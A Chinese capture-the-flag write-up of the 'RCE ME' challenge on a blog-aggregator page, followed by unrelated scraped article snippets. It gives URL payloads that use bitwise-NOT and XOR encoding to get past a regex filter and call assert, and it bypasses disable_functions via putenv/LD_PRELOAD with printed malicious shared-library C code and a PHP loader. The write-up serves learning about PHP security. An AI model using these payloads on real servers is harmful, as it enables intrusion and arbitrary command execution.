双层小牛堡
双层小牛堡

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置

目录

取反

1.蚁剑插件绕过

2.baypass disable_function

open_dir/disable_function

putenv()/LD_PRELOAD 来绕过限制

利用条件

利用思路

有意思。。。。

40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

过滤了数字字母

我们要绕过并且执行rce

这里使用取反和异或都可以

取反

我们首先来了解一下取反

通过这个代码 我们可以将字符取反并且通过url编码返回

所以在正则的时候 不会进行匹配

所以我们可以直接通过这个来构造payload

首先我们执行phpinfo()看看

这里的payload

?code=(~%8F%97%8F%96%91%99%90)();

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第1张图片

过滤了很多函数 我们可以使用内置函数 arrest()

这里有一个坑

assert(phpinfo();)

并不会直接执行

我们来尝试一下

?code=(~%9E%8D%8D%8C%9A%8B)((~%8F%97%8F%96%91%99%90)();)

这里就类似于 assert(phpinfo();)



?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%CE%A2%D6%D6);

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第2张图片

然后直接用蚁剑链接

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第3张图片

但是我们无法读取flag 和readflag也无法 这里我们想到了 之间phpinfo中禁用函数了

这里有两个方法桡骨

1.蚁剑插件绕过

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第4张图片

[极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第5张图片

然后 /readflag即可

第二种就很高大上了

2.baypass disable_function

深入浅出LD_PRELOAD & putenv()-安全客 - 安全资讯平台How to bypass disable_functions and open_basedir

首先我们了解一下如何防止getshell

open_dir/disable_function

这两个一个限制访问目录 一个限制访问函数 直接打死

我们如何绕过呢

putenv()/LD_PRELOAD 来绕过限制

LD_PRELOAD

是环境变量的路径文件 这个文件 在所有其他文件被调用前 首先执行

putenv()

这个函数是可以在这一次的请求中 暂时性的改变 环境变量

putenv ( string $setting ) : bool


通过 setting 添加到服务器的环境变量中 在当前请求中存活 在请求结束后消失

 既然我们都可以修改环境变量 了 我们是不是getshell 就更简单了

利用条件

这两个函数未被禁用

利用思路

1.我们生成一个恶意的 共享库

2.通过 putenv()设置LD_PRELOAD为恶意共享库

3.通过函数触发 恶意共享库

4.RCE

这里直接使用github上面大佬现成的so和php

https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

我们来看看

so代码

#define _GNU_SOURCE

#include 
#include 
#include 


extern char** environ;

__attribute__ ((__constructor__)) void preload (void)
{
    // get command line options and arg
    const char* cmdline = getenv("EVIL_CMDLINE");

    // unset environment variable LD_PRELOAD.
    // unsetenv("LD_PRELOAD") no effect on some 
    // distribution (e.g., centos), I need crafty trick.
    int i;
    for (i = 0; environ[i]; ++i) {
            if (strstr(environ[i], "LD_PRELOAD")) {
                    environ[i][0] = '\0';
            }
    }

    // executive command
    system(cmdline);
}

就是获取指令 然后不断 更新环境变量

 example: http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so 
";

    $cmd = $_GET["cmd"];
    $out_path = $_GET["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
    echo "
 cmdline: " . $evil_cmdline . "
";

    putenv("EVIL_CMDLINE=" . $evil_cmdline);

    $so_path = $_GET["sopath"];
    putenv("LD_PRELOAD=" . $so_path);

    mail("", "", "", "");

    echo "
 output: 
" . nl2br(file_get_contents($out_path)) . "
"; 

    unlink($out_path);
?>

 php代码

通过cmd参数来指定命令 通过out_path来指定输出文件 通过sopath来指定污染的so文件

这里我们只需要通过

_GET(_GET())

来arrset(include(/var/tmp/hack.php)) 即可访问php文件

 我们来通过取反执行

?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=ls&outpath=/var/tmp/easy&sopath=/var/tmp/bypass_disablefunc_x64.so

 [极客大挑战 2019]RCE ME 取反绕过正则匹配 绕过disable_function设置_第6张图片

 然后我们修改cmd 即可

?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=/readflag&outpath=/var/tmp/easy&sopath=/var/tmp/bypass_disablefunc_x64.so

但是这里我觉得我们还是了解一下比较好

扩展

了解漏洞就了解清楚了 我觉得才可以提升自己

我们来重新梳理一下劫持过程

这里我们要注意

我们使用mail函数 是因为 这个函数在执行后才会开启程序 这样我们就可以劫持进程

这里注意 mail()和error_log()都是开启了 sendmail进程 我们可以劫持 并且 sendmail中存在getuid函数 我们可以利用绕过disable_function

error_log()函数第二个参数要设置为1

我们来自己写一遍

第一种写法

hack.so

#include
#include
#include

void payload(){
    system('ls /> /tmp/flag')
}

int getuid(){
    if(getenv(LD_PRELOAD)==NULL){return 0;}
    unsetenv(LD_PRELOAD);
    payload();
}

 hack.php

 首先我们会include hack.php执行

然后就会设置共享库 hack.so  然后执行 mail

共享库的作用就是 定义了 getuid()这个函数 我们就可以覆盖掉之前的函数

因为LD_PRELOAD就是为了有选择的使用相同函数 就是可以在函数一样的情况下 指定选择

这样 我们判断当前环境变量 然后取消掉 设置payload即可

这样现在的getuid()函数就是 system("ls / -> /tmp/flag")

第二种写法

这种写法 就是大佬的写法了

首先我们要知道函数

__attribute__((constructor))

这个修饰符可以让其修饰的函数在 main函数启动前就启动

如果出现在共享对象中 如果共享被启动 就立马执行

 

#include
#include
#include

__attribute__((constructor)) void payload(){
    unsetenv(LD_PRELOAD);
    const char* cmd=getenv("CMD");
    system(cmd);
}

 这里通过php中的cmd变量 传递到so文件中 然后被获取 执行了cmd

编译方法都是一样的

gcc -shared -fPIC hack.c -o hack.so

你可能感兴趣的:(BUUctf,java,前端,服务器)

  • 【网络】TCP为什么采用三次握手?而不是两次,四次 YIOUTH 网络tcp/ip服务器
    TCP(TransmissionControlProtocol)是一种可靠的、面向连接的通信协议,它在建立连接时采用了三次握手的机制。这种设计并非偶然,而是为了确保连接的可靠性、安全性和效率。下面我们详细解释为什么TCP要采用三次握手。主要就是看两次握手会有什么问题1.防止历史连接的混淆在TCP的通信中,客户端和服务器之间可能存在多次尝试建立连接的情况。假设客户端发送了一个连接请求,但由于网络故障
  • Python网络爬虫:从原理到实践的全面解析 九月 linuxpython网络爬虫爬虫
    1.什么是Python爬虫?Python网络爬虫是一种通过Python编写的自动化程序,用于从互联网上的网页、数据库或服务器中提取结构化数据。其核心功能是模拟人类浏览网页的行为,按照预设规则遍历目标网站,抓取文本、图片、链接等信息。爬虫也被称为“网页蜘蛛”或“网络机器人”,广泛应用于搜索引擎索引构建、数据挖掘等领域。2.Python爬虫的运作机制爬虫的工作流程可分为以下步骤:发送请求:通过HTTP
  • windows安装jdk weixin_33955681 java
    应用场景在windows系统环境中,如果需要运行java,开发java的环境,那么就需要在电脑上安装jdk【又称为,java的运行开发环境】,很多第三方软件都需要使用到jdk,比如tomcat,eclipse,等等,所以安装jdk,可能是安装很多软件的第一步!资源下载jdk1.7下载jdk1.7下载地址jdk1.8下载jdk1.8下载地址安装步骤安装过程十分简单,双击下载的exe可执行文件安装完毕
  • 【前端】系统 南瓜啊 前端
    App.vuemain.js//import'./assets/main.css'import{createApp}from'vue'import{createPinia}from'pinia'importAppfrom'./App.vue'importrouterfrom'./router'importdirectivesfrom"@/directives";constapp=createApp
  • TCP 全连接队列与 tcpdump 抓包 ketil27 tcp/iptcpdump网络
    TCP相关实验理解listen的第二个参数基于刚才封装的TcpSocket实现以下测试代码对于服务器,listen的第二个参数设置为1,并且不调用accepttest_server.ccC#include"tcp_socket.hpp"intmain(intargc,char*argv[]){if(argc!=3){printf("Usage./test_server[ip][port]\n");
  • 计算机网络——TCP / IP 网络模型 确定吗阿斌 网络计算机网络tcp/ip
    OSI七层模型七层模型是国际标准化的一个网络分层模型,大体结构可以分成七层。每层提供不同的功能。图片来源JavaGuide但是这样七层结构比较复杂,不太实用,所以有了TCP/IP模型。TCP/IP网络模型TCP/IP网络模型可以看作是OSI模型的简化版本。它将OSI网络模型合并成了4层结构。应用层、表示层、会话层统一被合并成了应用层。传输层和网络层没有变化,数据链路层和物理层合并成了物理链路层/网
  • 基于Flask实现的多语言Hello World 老大白菜 pythonflaskpython后端
    简介在这篇文章中,我们将探讨如何使用Flask框架创建一个智能的多语言HelloWorld服务器。这个服务器能够自动检测访问者的浏览器语言设置,并返回相应语言版本的"HelloWorld"问候语,支持超过20种世界主要语言。技术栈Python3.xFlask框架HTTP请求头处理Unicode字符串处理核心功能自动语言检测多语言支持(支持20种主要语言)优雅的降级处理(默认使用英语)支持区域特定的
  • Github 仓库 git clone 速度过慢解决方案 事业运财运爆棚 github
    很多时候想从GitHub上clone一个仓库,都会遇到速度慢的问题,而且经常连接失败,这里给出有效解决方案。一、背景应该是很多小伙伴碰到过的问题:想从GitHub上面clone项目,很多情况下会慢的离谱,等待好久后报错:代码语言:javascript代码运行次数:0复制CloudStudio代码运行fatal:earlyEOFfatal:theremoteendhungupunexpectedly
  • Java必知必会系列:RESTful API与Web服务 AI天才研究院 AI实战DeepSeekR1&大数据AI人工智能大模型Python实战大数据人工智能语言模型JavaPython架构设计
    文章目录1.背景介绍RESTfulAPI与Web服务什么是RESTful?为什么要用RESTfulAPI?Web服务架构1.客户端–服务器体系结构2.无状态3.明确的角色4.使用合适的HTTP方法5.支持缓存6.使用链接关系代替非自描述信息7.异步处理RESTfulAPI框架SpringMVCRubyonRailsDjangoRestFramework如何利用框架开发RESTfulAPI创建项目创
  • 使用aspose-words word转pdf,并解决部署centos服务器后转换pdf中文变成小方块乱码问题 Beyond LinuxJava乱码javaasposeaspose-wordcentos
    一、前言需要做一个word转pdf功能就找到了aspose,代码是真的简单,三两句代码的就生成了,本来没打算写这个,没想到上线之后噩梦来咯。centos服务器中文全变成小方块了。把百度上能找的都找了个遍,问题大部分是复制的,有几个不复制的也没解决问题,竟然还忽悠我重启服务器,真***的,幸亏我没信,着重说一下解决乱码不用重启、不用重启、不用重启,一点点说吧,尽量把解决过程说详细一点。二、word转
  • Kotlin DSL(Domain-Specific Language,领域特定语言) tangweiguo03051987 kotlinpython开发语言
    DSL(Domain-SpecificLanguage,领域特定语言)是一种专门为某个特定领域设计的编程语言。与通用编程语言(如Java、Kotlin等)相比,DSL通常具有更简洁的语法和更少的语法元素,这使得它更适合用于描述特定领域的概念和操作。在Kotlin中,DSL可以以多种方式实现,例如使用函数式编程、使用扩展函数、使用中缀表达式等。以下是实现DSL的示例://使用函数式编程funbuil
  • Java反射 qq_65860758 java开发语言
    Java反射:深入探索与实战应用在Java编程的世界里,反射(Reflection)是一种强大的机制,它允许程序在运行时检查、修改和操作自身的结构和行为。通过反射,你可以动态地获取类的属性、方法、构造函数等信息,甚至可以调用私有方法和访问私有字段。这种能力在框架开发、依赖注入、测试工具等场景中尤为重要。本文将带你深入了解Java反射的工作原理、基本用法以及实战应用。一、反射的基本概念反射的核心在于
  • 基于JavaWeb开发的Java+SpringBoot+vue+element实现前后端分离玩具商城系统 网顺技术团队 成品程序项目springboot开发语言课程设计javavue.js
    基于JavaWeb开发的Java+SpringBoot+vue+element实现前后端分离玩具商城系统作者主页网顺技术团队欢迎点赞收藏⭐留言文末获取源码联系方式查看下方微信号获取联系方式承接各种定制系统精彩系列推荐精彩专栏推荐订阅不然下次找不到哟Java毕设项目精品实战案例《1000套》感兴趣的可以先收藏起来,还有大家在毕设选题,项目以及论文编写等相关问题都可以给我留言咨询,希望帮助更多的人文章
  • SpringBoot配置文件的优先级(保姆级超详细讲解) 来杯@Java springbootpython后端
    文章目录配置优先级排序项目外部配置文件项目内部配置文件Bootstrap配置文件配置优先级排序命令行参数;java:comp/env的JNDI属性(当前J2EE应用的环境);JAVA系统的环境属性;操作系统的环境变量;JAR包外部的application-xxx.properties或application-xxx.yml配置文件;JAR包内部的application-xxx.properties
  • Java实现向MySQL数据库批量更新数据的常见方法 来杯@Java 数据库javamysql
    文章目录一、IN二、For+Update三、insertinto...onduplicatekeyupdate四、replaceinto五、set...case...when...where六、创建临时表案例一、IN第一种方式是借助IN语句,这种方式局限性较大,更新结果必须一致,比如下面就是将满足条件的行的状态(status)都置为1。如果是一部分置为1,一部分置为2等,则无法实现,要么就是写多条
  • 谈谈 HTTPS 的工作原理,SSL / TLS 握手流程是什么? 程序员黄同学 前端开发JavaScriptnode.jshttpsssl网络协议
    一、HTTPS核心机制:非对称加密+对称加密HTTPS=HTTPoverTLS/SSL,通过混合加密体系解决三大问题:防窃听-对称加密传输内容(如AES)防篡改-数字签名验证数据完整性防冒充-数字证书验证服务器身份//前端感知的典型场景:混合内容拦截//在HTTPS页面加载HTTP资源会被浏览器拦截//控制台报错:MixedContent:ThepagewasloadedoverHTTPS...二
  • 网络攻击之-Webshell流量告警运营分析篇 村中少年 安全运营之网络攻击研判分析webshellwebshell上传webshell注入webshell通信webshell工具webshell数据包webshell研判
    本文从Webshell的定义,多种Webshell利用的流量数据包示例,Webshell的suricata规则,Webshell的告警研判,Webshell的处置建议等几个方面阐述如何通过IDS/NDR,态势感知等流量平台的Webshell类型的告警的线索,开展日常安全运营工作,从而挖掘有意义的安全事件。Webshell定义Webshell是一种用于远程控制和操作Web服务器的恶意脚本或程序。攻击
  • Java实现Word文档转换为PDF详解 一休哥助手 工具javajavawordpdf
    目录引言为什么要将Word转换为PDF实现方式概述使用ApachePOI和iTextApachePOI简介iText简介安装依赖代码实现
  • java练习(46) IIIIIIlllii 算法数据结构java
    ps:题目来自力扣四数之和给你一个由n个整数组成的数组nums,和一个目标值target。请你找出并返回满足下述全部条件且不重复的四元组[nums[a],nums[b],nums[c],nums[d]](若两个四元组元素一一对应,则认为两个四元组重复):0>fourSum(int[]nums,inttarget){List>result=newArrayList0&&nums[i]==nums[i
  • 网络安全:攻击和防御练习(全战课), DDos压力测试 网安-轩逸 web安全ddosokhttp
    XSS跨站脚本攻击:Cross-sitescripting(简称xss)跨站脚本。一种网站的安全漏洞的攻击,代码注入攻击的一种。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。
  • 配置 DNS over HTTPS阻止DNS污染 网安-轩逸 https网络网络协议
    概念介绍DOH简介DNS(域名系统)的主要功能是将域名解析成IP地址,域名的解析工作由DNS服务器完成。从安全角度来看,域名解析的请求传输时通常不进行任何加密,这导致第三方能够很容易拦截用户的DNS,将用户的请求跳转到另一个地址,常见的攻击方法有DNS劫持和DNS污染。因此,使用不加密的DNS服务是不安全的。而DoH(DNSoverHTTPS)是一个安全的域名解析方案。其意义在于以加密的HTTPS
  • 【Java数据结构】哈希表 回响N 数据结构散列表哈希算法
    哈希表1.哈希表哈希散列(散列表):不经过任何比较,一次直接从表中得到要搜索的元素,时间复杂度是O(1)。哈希函数的设置hash(key)=key%capacity,capacity是存储元素底层空间总的大小。2.哈希冲突当数据集合中可能存在多个数据都被插在一块区域,如上面例题23和3取模后都放在了数组下标3的位置,这是就存在冲突,也就被称为哈希冲突。冲突的解决方法:避免冲突、解决冲突。3.避免冲
  • 推荐算法工程师的技术图谱和学习路径 执于代码 开发者职业加速服务推荐算法学习算法
    推荐算法工程师的技术图谱和学习路径可以从多个维度进行概述,可以总结如下:一、技术图谱推荐算法工程师需要掌握的技术栈主要分为以下几个方面:数学基础:微积分、线性代数、概率论与统计学是推荐算法的基础,用于理解模型的数学原理和优化算法。高等数学、最优化理论、几何和图论等知识对于复杂模型的设计和优化至关重要。编程与数据结构:熟练掌握Python、Java等编程语言,具备良好的编程习惯和代码优化能力。掌握数
  • YashanDB安装前依赖项准备 数据库
    本文内容来自YashanDB官网,原文内容请见https://doc.yashandb.com/yashandb/23.3/zh/%E5%AE%89%E8%A3%85%...#依赖项准备为保障YashanDB的正常安装和运行,请按如下来源及最低版本要求,在所有服务器环境中配置所需依赖项:动态库名称来源版本要求作用libcrypto.so.1.1openssl1.1.1加密libssl.soopen
  • Android15 am命令 APP安装流程 惠(xi)斌 python开发语言
    一.PM安装命令使用命令pminstall-rxxx.apkpm命令安装app会触发PackageManagerShellCommand中runInstall()方法frameworks/base/services/core/java/com/android/server/pm/PackageManagerShellCommand.java1.onCommand函数:publicintonComm
  • Java和C++的区别有哪些? javac++
    语言特性编译与运行机制Java:是一种半编译半解释型的语言。Java源代码(.java文件)首先通过编译器(如javac)编译成字节码文件(.class文件),字节码是一种中间形式,不直接对应特定硬件平台的机器码。然后,Java虚拟机(JVM)负责解释执行字节码,使得Java程序具有“一次编写,到处运行”的跨平台特性。C++:是编译型语言。C++源代码经过编译器(如GCC、Clang等)直接编译成
  • build.gradle文件generateProtoTasks含义 天若子 android
    在Android项目的build.gradle文件中,generateProtoTasks通常与使用ProtocolBuffers(Protobuf)进行代码生成相关,下面为你详细解释其含义和作用。整体背景ProtocolBuffers是一种用于序列化结构化数据的高效机制,在Android和Java项目中,我们通常会定义.proto文件来描述数据结构,然后使用Protobuf编译器根据这些.pro
  • 初识React,基础(1), 安装react,jsx文件,类组件和函数组件,css样式 ybilss reactreact.js前端前端框架
    第一部分:初识reactreact:用于构建用户界面的JavaScript库全局安装,win+r,命令:npminstallcreate-react-app-g3.创建一个react应用,这里我在vscode里面创建,创建之后,运行create-react-appmy-appcdmy-appnpmstart第二部分:redact组件定义以及使用react中组件分为两种:类组件和函数组件,一般使用是
  • 默默的学python——变量 xiaoli_panpan #python基础python开发语言linux
    一、Python的变量定义在Python中,变量(variable)的定义其实是一种更宽松的概念,与其他一些编程语言(如C、Java等)有所不同。在Python中,当你为某个东西(例如一个值、一个对象、一个数据结构等)赋予一个名字时,你就创建了一个变量。因此,我们不难得知:变量(variable)是表示(或指向)特定值的名称。Python的变量定义有几个关键点:1、动态类型:Python是一种动态
  • 如何在React.js中使用Shadcn/UI
    如何在React.js中使用Shadcn/UI学习如何在React.js中使用Shadcn/UI构建可自定义且轻量的界面。了解如何将其与Apipost集成,以实现高效的API管理和测试。非常适合希望提升React.js项目的开发者!使用Shadcn/UI构建现代化界面创建简洁的用户界面是前端开发者的主要目标之一。随着组件库的兴起,这一任务变得更加简化。今天,我们将深入探讨Shadcn/UI,这是一
  • java短路运算符和逻辑运算符的区别 3213213333332132 java基础
    /* * 逻辑运算符——不论是什么条件都要执行左右两边代码 * 短路运算符——我认为在底层就是利用物理电路的“并联”和“串联”实现的 * 原理很简单,并联电路代表短路或(||),串联电路代表短路与(&&)。 * * 并联电路两个开关只要有一个开关闭合,电路就会通。 * 类似于短路或(||),只要有其中一个为true(开关闭合)是
  • Java异常那些不得不说的事 白糖_ javaexception
    一、在finally块中做数据回收操作 比如数据库连接都是很宝贵的,所以最好在finally中关闭连接。 JDBCAgent jdbc = new JDBCAgent(); try{ jdbc.excute("select * from ctp_log"); }catch(SQLException e){ ... }finally{ jdbc.close();
  • utf-8与utf-8(无BOM)的区别 dcj3sjt126com PHP
    BOM——Byte Order Mark,就是字节序标记   在UCS 编码中有一个叫做"ZERO WIDTH NO-BREAK SPACE"的字符,它的编码是FEFF。而FFFE在UCS中是不存在的字符,所以不应该出现在实际传输中。UCS规范建议我们在传输字节流前,先传输 字符"ZERO WIDTH NO-BREAK SPACE"。这样如
  • JAVA Annotation之定义篇 周凡杨 java注解annotation入门注释
        Annotation: 译为注释或注解 An annotation, in the Java computer programming language, is a form of syntactic metadata that can be added to Java source code. Classes, methods, variables, pa
  • tomcat的多域名、虚拟主机配置 g21121 tomcat
    众所周知apache可以配置多域名和虚拟主机,而且配置起来比较简单,但是项目用到的是tomcat,配来配去总是不成功。查了些资料才总算可以,下面就跟大家分享下经验。 很多朋友搜索的内容基本是告诉我们这么配置: 在Engine标签下增面积Host标签,如下: <Host name="www.site1.com" appBase="webapps"
  • Linux SSH 错误解析(Capistrano 的cap 访问错误 Permission ) 510888780 linuxcapistrano
    1.ssh -v hdfs@192.168.18.133 出现 Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password). 错误 运行状况如下: OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 debug1: Reading configuratio
  • log4j的用法 Harry642 javalog4j
    一、前言:     log4j 是一个开放源码项目,是广泛使用的以Java编写的日志记录包。由于log4j出色的表现,     当时在log4j完成时,log4j开发组织曾建议sun在jdk1.4中用log4j取代jdk1.4 的日志工具类,但当时jdk1.4已接近完成,所以sun拒绝使用log4j,当在java开发中
  • mysql、sqlserver、oracle分页,java分页统一接口实现 aijuans oraclejave
    定义:pageStart 起始页,pageEnd 终止页,pageSize页面容量 oracle分页:     select * from ( select mytable.*,rownum num from (实际传的SQL) where rownum<=pageEnd) where num>=pageStart sqlServer分页:  
  • Hessian 简单例子 antlove javaWebservicehessian
    hello.hessian.MyCar.java package hessian.pojo; import java.io.Serializable; public class MyCar implements Serializable { private static final long serialVersionUID = 473690540190845543
  • 数据库对象的同义词和序列 百合不是茶 sql序列同义词ORACLE权限
    回顾简单的数据库权限等命令; 解锁用户和锁定用户 alter user scott account lock/unlock; //system下查看系统中的用户 select * dba_users; //创建用户名和密码 create user wj identified by wj; identified by //授予连接权和建表权 grant connect to
  • 使用Powermock和mockito测试静态方法 bijian1013 持续集成单元测试mockitoPowermock
            实例: package com.bijian.study; import static org.junit.Assert.assertEquals; import java.io.IOException; import org.junit.Before; import org.junit.Test; import or
  • 精通Oracle10编程SQL(6)访问ORACLE bijian1013 oracle数据库plsql
    /* *访问ORACLE */ --检索单行数据 --使用标量变量接收数据 DECLARE v_ename emp.ename%TYPE; v_sal emp.sal%TYPE; BEGIN select ename,sal into v_ename,v_sal from emp where empno=&no; dbms_output.pu
  • 【Nginx四】Nginx作为HTTP负载均衡服务器 bit1129 nginx
     Nginx的另一个常用的功能是作为负载均衡服务器。一个典型的web应用系统,通过负载均衡服务器,可以使得应用有多台后端服务器来响应客户端的请求。一个应用配置多台后端服务器,可以带来很多好处:   负载均衡的好处 增加可用资源 增加吞吐量 加快响应速度,降低延时 出错的重试验机制 Nginx主要支持三种均衡算法: round-robin l
  • jquery-validation备忘 白糖_ jquerycssF#Firebug
    留点学习jquery validation总结的代码:   function checkForm(){ validator = $("#commentForm").validate({// #formId为需要进行验证的表单ID errorElement :"span",// 使用"div"标签标记错误, 默认:&
  • solr限制admin界面访问(端口限制和http授权限制) ronin47 限定Ip访问
    solr的管理界面可以帮助我们做很多事情,但是把solr程序放到公网之后就要限制对admin的访问了。 可以通过tomcat的http基本授权来做限制,也可以通过iptables防火墙来限制。 我们先看如何通过tomcat配置http授权限制。 第一步: 在tomcat的conf/tomcat-users.xml文件中添加管理用户,比如: <userusername="ad
  • 多线程-用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 bylijinnan java多线程
    public class IncDecThread { private int j=10; /* * 题目:用JAVA写一个多线程程序,写四个线程,其中二个对一个变量加1,另外二个对一个变量减1 * 两个问题: * 1、线程同步--synchronized * 2、线程之间如何共享同一个j变量--内部类 */ public static
  • 买房历程 cfyme
        2015-06-21: 万科未来城,看房子   2015-06-26: 办理贷款手续,贷款73万,贷款利率5.65=5.3675   2015-06-27: 房子首付,签完合同   2015-06-28,央行宣布降息 0.25,就2天的时间差啊,没赶上。   首付,老婆找他的小姐妹接了5万,另外几个朋友借了1-
  • [军事与科技]制造大型太空战舰的前奏 comsci 制造
           天气热了........空调和电扇要准备好..........        最近,世界形势日趋复杂化,战争的阴影开始覆盖全世界..........        所以,我们不得不关
  • dateformat dai_lm DateFormat
    "Symbol Meaning Presentation Ex." "------ ------- ------------ ----" "G era designator (Text) AD" "y year
  • Hadoop如何实现关联计算 datamachine mapreducehadoop关联计算
        选择Hadoop,低成本和高扩展性是主要原因,但但它的开发效率实在无法让人满意。     以关联计算为例。     假设:HDFS上有2个文件,分别是客户信息和订单信息,customerID是它们之间的关联字段。如何进行关联计算,以便将客户名称添加到订单列表中?   &nbs
  • 用户模型中修改用户信息时,密码是如何处理的 dcj3sjt126com yii
    当我添加或修改用户记录的时候对于处理确认密码我遇到了一些麻烦,所有我想分享一下我是怎么处理的。 场景是使用的基本的那些(系统自带),你需要有一个数据表(user)并且表中有一个密码字段(password),它使用 sha1、md5或其他加密方式加密用户密码。 面是它的工作流程: 当创建用户的时候密码需要加密并且保存,但当修改用户记录时如果使用同样的场景我们最终就会把用户加密过的密码再次加密,这
  • 中文 iOS/Mac 开发博客列表 dcj3sjt126com Blog
      本博客列表会不断更新维护,如果有推荐的博客,请到此处提交博客信息。 本博客列表涉及的文章内容支持 定制化Google搜索,特别感谢 JeOam 提供并帮助更新。 本博客列表也提供同步更新的OPML文件(下载OPML文件),可供导入到例如feedly等第三方定阅工具中,特别感谢 lcepy 提供自动转换脚本。这里有导入教程。
  • js去除空格,去除左右两端的空格 蕃薯耀 去除左右两端的空格js去掉所有空格js去除空格
    js去除空格,去除左右两端的空格 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>&g
  • SpringMVC4零配置--web.xml hanqunfeng springmvc4
    servlet3.0+规范后,允许servlet,filter,listener不必声明在web.xml中,而是以硬编码的方式存在,实现容器的零配置。 ServletContainerInitializer:启动容器时负责加载相关配置 package javax.servlet; import java.util.Set; public interface ServletContainer
  • 《开源框架那些事儿21》:巧借力与借巧力 j2eetop 框架UI
    同样做前端UI,为什么有人花了一点力气,就可以做好?而有的人费尽全力,仍然错误百出?我们可以先看看几个故事。 故事1:巧借力,乌鸦也可以吃核桃 有一个盛产核桃的村子,每年秋末冬初,成群的乌鸦总会来到这里,到果园里捡拾那些被果农们遗落的核桃。 核桃仁虽然美味,但是外壳那么坚硬,乌鸦怎么才能吃到呢?原来乌鸦先把核桃叼起,然后飞到高高的树枝上,再将核桃摔下去,核桃落到坚硬的地面上,被撞破了,于是,
  • JQuery EasyUI 验证扩展 可怜的猫 jqueryeasyui验证
      最近项目中用到了前端框架-- EasyUI,在做校验的时候会涉及到很多需要自定义的内容,现把常用的验证方式总结出来,留待后用。   以下内容只需要在公用js中添加即可。   使用类似于如下: <input class="easyui-textbox" name="mobile" id="mobile&
  • 架构师之httpurlconnection----------读取和发送(流读取效率通用类) nannan408
    1.前言.    如题. 2.代码. /* * Copyright (c) 2015, S.F. Express Inc. All rights reserved. */ package com.test.test.test.send; import java.io.IOException; import java.io.InputStream
  • Jquery性能优化 r361251 JavaScriptjquery
    一、注意定义jQuery变量的时候添加var关键字 这个不仅仅是jQuery,所有javascript开发过程中,都需要注意,请一定不要定义成如下: $loading = $('#loading'); //这个是全局定义,不知道哪里位置倒霉引用了相同的变量名,就会郁闷至死的 二、请使用一个var来定义变量 如果你使用多个变量的话,请如下方式定义: . 代码如下: var page
  • 在eclipse项目中使用maven管理依赖 tjj006 eclipsemaven
    概览: 如何导入maven项目至eclipse中 建立自有Maven  Java类库服务器 建立符合maven代码库标准的自定义类库 Maven在管理Java类库方面有巨大的优势,像白衣所说就是非常“环保”。 我们平时用IDE开发都是把所需要的类库一股脑的全丢到项目目录下,然后全部添加到ide的构建路径中,如果用了SVN/CVS,这样会很容易就 把
  • 中国天气网省市级联页面 x125858805 级联
    1、页面及级联js <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> &l
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他